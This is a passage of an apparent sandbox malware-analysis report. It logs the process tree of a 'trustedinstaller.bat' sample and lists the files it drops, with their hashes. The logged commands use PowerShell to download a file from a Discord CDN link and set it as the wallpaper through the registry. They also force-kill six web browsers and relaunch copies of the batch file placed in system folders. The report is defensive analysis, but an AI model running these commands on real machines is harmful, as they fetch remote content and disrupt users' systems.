                                                                                  • Sets desktop wallpaper using registry
                                                                                  PID:4928
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                  4⤵
                                                                                    PID:4308
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                                                                                  3⤵
                                                                                    PID:4212
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                      4⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5216
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                      4⤵
                                                                                      • Sets desktop wallpaper using registry
                                                                                      PID:6112
                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                      4⤵
                                                                                        PID:5392
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                                                                      3⤵
                                                                                        PID:4204
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5528
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                          4⤵
                                                                                          • Sets desktop wallpaper using registry
                                                                                          PID:1292
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                          4⤵
                                                                                            PID:1452
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "chrome.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4236
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "firefox.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3468
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "msedge.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1540
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "opera.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:6052
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "brave.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:6076
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /f /im "vivaldi.exe"
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5972
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 60 /nobreak
                                                                                          3⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:2608
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 60 /nobreak
                                                                                          3⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:924
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 60 /nobreak
                                                                                          3⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:4376
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                                                                                        2⤵
                                                                                        • Drops file in System32 directory
                                                                                        • Drops file in Program Files directory
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3160
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                          3⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2276
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                          3⤵
                                                                                          • Sets desktop wallpaper using registry
                                                                                          PID:2628
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                          3⤵
                                                                                            PID:3568
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
                                                                                            3⤵
                                                                                              PID:2964
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                4⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4480
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                4⤵
                                                                                                • Sets desktop wallpaper using registry
                                                                                                PID:5756
                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                4⤵
                                                                                                  PID:3176
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                                                                                                3⤵
                                                                                                  PID:4784
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                    4⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3972
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                    4⤵
                                                                                                    • Sets desktop wallpaper using registry
                                                                                                    PID:5732
                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                    4⤵
                                                                                                      PID:1084
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                                                                                                    3⤵
                                                                                                      PID:3276
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                        4⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4308
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                        4⤵
                                                                                                        • Sets desktop wallpaper using registry
                                                                                                        PID:2768
                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                        4⤵
                                                                                                          PID:5216
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                                                                                                        3⤵
                                                                                                          PID:2896
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                            4⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5332
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                            4⤵
                                                                                                            • Sets desktop wallpaper using registry
                                                                                                            PID:5024
                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                            4⤵
                                                                                                              PID:5584
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                                                                                                            3⤵
                                                                                                              PID:3652
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                                4⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:216
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                                4⤵
                                                                                                                • Sets desktop wallpaper using registry
                                                                                                                PID:2468
                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                4⤵
                                                                                                                  PID:1296
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                                                                                                3⤵
                                                                                                                  PID:4964
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                                    4⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4172
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                                    4⤵
                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                    PID:5484
                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                    4⤵
                                                                                                                      PID:6108
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "chrome.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4864
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "firefox.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5932
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "msedge.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3048
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "opera.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1824
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "brave.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5984
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "vivaldi.exe"
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5600
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:5532
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:2628
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:2240
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                                                                                                  2⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1120
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                                                    3⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1408
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                                                    3⤵
                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                    PID:4332
                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                    3⤵
                                                                                                                      PID:3340
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "chrome.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1832
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "firefox.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1128
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "msedge.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5312
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "opera.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5244
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "brave.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5300
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /f /im "vivaldi.exe"
                                                                                                                    2⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5084
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:5480
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:2232
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 60 /nobreak
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:224
                                                                                                                • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                  C:\Windows\System32\WaaSMedicAgent.exe 468fb3b5cd290625c2c6947823a2b62b Y2Ob2QVAwU6uSA9mBklELg.0.1.0.0.0
                                                                                                                  1⤵
                                                                                                                    PID:2276
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      2⤵
                                                                                                                        PID:6112

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\BatchFile\trustedinstaller.bat

                                                                                                                      Filesize

                                                                                                                      3KB

                                                                                                                      MD5

                                                                                                                      a342c02d8b85d351af8871776fc67dd7

                                                                                                                      SHA1

                                                                                                                      4b7c7e5697cee05354f0902a3c40d35c7c892a7d

                                                                                                                      SHA256

                                                                                                                      9802eda5439017e0b2fe42d53bbeac75176c52b4383e33d1a4cb445a00b16b8b

                                                                                                                      SHA512

                                                                                                                      7ae1f71e87dc52c2dd640c025ca623304e28717119c52107163d905e8f17d6a20de243e6a1cf8f75ab9e797224b47eae199a669e209998620625b20c099657d5

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                      SHA1

                                                                                                                      445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                      SHA256

                                                                                                                      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                      SHA512

                                                                                                                      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      8a1aed0c5750d9c66af9fa520d7743d9

                                                                                                                      SHA1

                                                                                                                      899dd7d1a0f6e7ac51f33933ecef78c4f34b8a71

                                                                                                                      SHA256

                                                                                                                      2d58c85a122093565b3482f0a1b7eb8ff3a05335497f2c47559297804fcb6b9c

                                                                                                                      SHA512

                                                                                                                      655b12da069f1de058c6ca5f4830be21d271d48772046964a2c375786f6d243905b9746aaf1cc7741c0f496aece4c93701368ff2a44f5ecb9d74ed1e079c15e8

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      f844e18314690934a1c8554e734ed892

                                                                                                                      SHA1

                                                                                                                      2a6f91fb1a47342e4df91ff5e2bbe4044f70765f

                                                                                                                      SHA256

                                                                                                                      0d557b3425b5b9a7129233e45bd457eb3635f0905994c186c2f7416e46ac76e2

                                                                                                                      SHA512

                                                                                                                      0420bae6a9cf6ab28ca9dfeaf3409a0f7efad59318ac64179bb212aff7ea3681445c4099202c93a14ed39a9a36374c6da995d957ee538116174ec3c283a8f364

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      0579e409bfdb135b8b6b14ed1bd0841e

                                                                                                                      SHA1

                                                                                                                      82743b0f39b0c33bbd801380a62138bff9784a21

                                                                                                                      SHA256

                                                                                                                      d0f94b28f61cf80e1c0d549e378899c4929326c647914031ce0b6feaf6c77daa

                                                                                                                      SHA512

                                                                                                                      54a5f1fe79da40be3d026c7764ef7ef76414cd79eea097a1ca7d0ae4a8139f6b57ba8277b526f2aa82cd067d372c2adaead31b86debaa6467b3ff8853d38697a

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      b27e5c80db93354c87ecdc687c7636a3

                                                                                                                      SHA1

                                                                                                                      a4cefa26f72e4d2f4858cad5327d71ba7aa611fa

                                                                                                                      SHA256

                                                                                                                      ced2921ac44edf073cf6fcac97086d25006990d806939040244c669fe2c35d10

                                                                                                                      SHA512

                                                                                                                      dfc4c1c0a7a9158cee9fb4ce6751bc9752dc3537f876428c099a0b235c2a8db62ca5c968f236dcb28b2add90ab4e333e95e35128163910345d2047da7664fc25

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      8436d10cdef2ac992ebe24ab15c6e9b2

                                                                                                                      SHA1

                                                                                                                      620fedb33dec176f6731a982970d61efe41505a4

                                                                                                                      SHA256

                                                                                                                      b87fa6fc8b57c9a9e791547284725233aa10d40c594a770ef1f0bc8478fa63af

                                                                                                                      SHA512

                                                                                                                      cbd3951ae7355f09973ec1c954c410f7471e65de8324ec374c5b450583c59d9c1f6766b73d06b736bae4e9301fe2b61ffa0a139442bc47d33184aea28d078ff3

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      c0ceb9f5abfc1870f6c365016cb3e8fe

                                                                                                                      SHA1

                                                                                                                      c5c87a5101058052a6da73903d75484d2c09654b

                                                                                                                      SHA256

                                                                                                                      bd544cc2c4e4385bb794d8f78d3d3490f1a992c4457337c0deb41ad3701327dd

                                                                                                                      SHA512

                                                                                                                      a73ab986de0ff9052330b9db3e5958a5436d8a9d0db58af604b0b326b016e4f869769eb3b5fb6b033d0b3d610d1fc464d0a1e9596beee75842b3e79bd8329bf9

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      835da9199c16f074714996f994c01b2b

                                                                                                                      SHA1

                                                                                                                      b6beef9812d7ba33073ff7d2bc62f3b28cd12824

                                                                                                                      SHA256

                                                                                                                      02fa204426ea92f72d46393da9ef2ab00fcc9dd54c05ed432b59dc1b9ff66530

                                                                                                                      SHA512

                                                                                                                      374d1cfdf8912ccbb14b8eab29f8f1516b29130b1e31f61a5fc52cdbceee3f86027e1d92fef612e470f3cbfea5bc896958dc17d19b1c925440cf259cfcf594ef

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      664fac119dfd73ece2201b5d4711b7e3

                                                                                                                      SHA1

                                                                                                                      aac65a8be17e20dbf4da1a5bc2523c746fdacda4

                                                                                                                      SHA256

                                                                                                                      185c07200cda6bc0631e50145b228d575f66b9a32d17c2eecba4292bdca6c559

                                                                                                                      SHA512

                                                                                                                      4cc3f02c46d6abef9bd0ca761fbe4bb59469e0837d53b5c5ed9171155aaec60a7bb38c5aaf82634660451c0d2e6292b598dcfd491e0f737ffaa9765657dbe5f1

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      4124e3ac43b4b5c0ec809ba8804e33f3

                                                                                                                      SHA1

                                                                                                                      2343fcdcd963497d245d6ecc6f5b7fdea0934f84

                                                                                                                      SHA256

                                                                                                                      2e7303ad18710e0b45d90f07aa593d3e3c5f96e01644460980279033c164c31f

                                                                                                                      SHA512

                                                                                                                      848cd3b1a56c9ddf5591b2d2cd08d08433d679cfaad3978df4e4496b4eca0415901553a8fcbdb0544845524168a577f44495050a5361545d1f690ef42ef6a484

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      f171748e77672a03b4fa4184b931a476

                                                                                                                      SHA1

                                                                                                                      d84996c2650fc62bc4de44769e161760445bb52c

                                                                                                                      SHA256

                                                                                                                      511b1cb690916a55f503ae0be2d4fdcbc84a3f0125f513de48a13dd16d61749d

                                                                                                                      SHA512

                                                                                                                      96152cf2d2ab2f1f3fe00f827e24bdb1af02401869dec085791f66bd0ad216d4dc69fc9c9180da6196b2f1c230650c31d79f2004b5021d253c2b66ee91b57dd0

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      5add60706a6084f3d5e8abb9342e2a0d

                                                                                                                      SHA1

                                                                                                                      d08cf5b182a00d416017007f8de450749e528d70

                                                                                                                      SHA256

                                                                                                                      d6a4d49b0f81bf50090c1d073c77b28322f8842ae660c3027ee6cd6c324c9843

                                                                                                                      SHA512

                                                                                                                      dac9a302d7f293e0762b27124d939f107aeeb9810697512468ef72e27888faf88d12ebfbad2f36795cfd35c751c4f91dbe697fba749e6efd2abb93ea67e7d109

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      d31551143dffa380585324a0ae887f98

                                                                                                                      SHA1

                                                                                                                      d85c90b23fc8e294150e52531e4d1a4df2b9f5dc

                                                                                                                      SHA256

                                                                                                                      3e35b7df7011979bf24fdaf74d07931418327e9acf112cc63aa44696e19b26cc

                                                                                                                      SHA512

                                                                                                                      01e8fb94a28ef163a95154c0c84f9a5761857c340f19fb4409df0e3d54a3f0f4049a4fa7f79a23e8db6ff3dfa34f18efd7c9e290674cf813b5ac649b257cd529

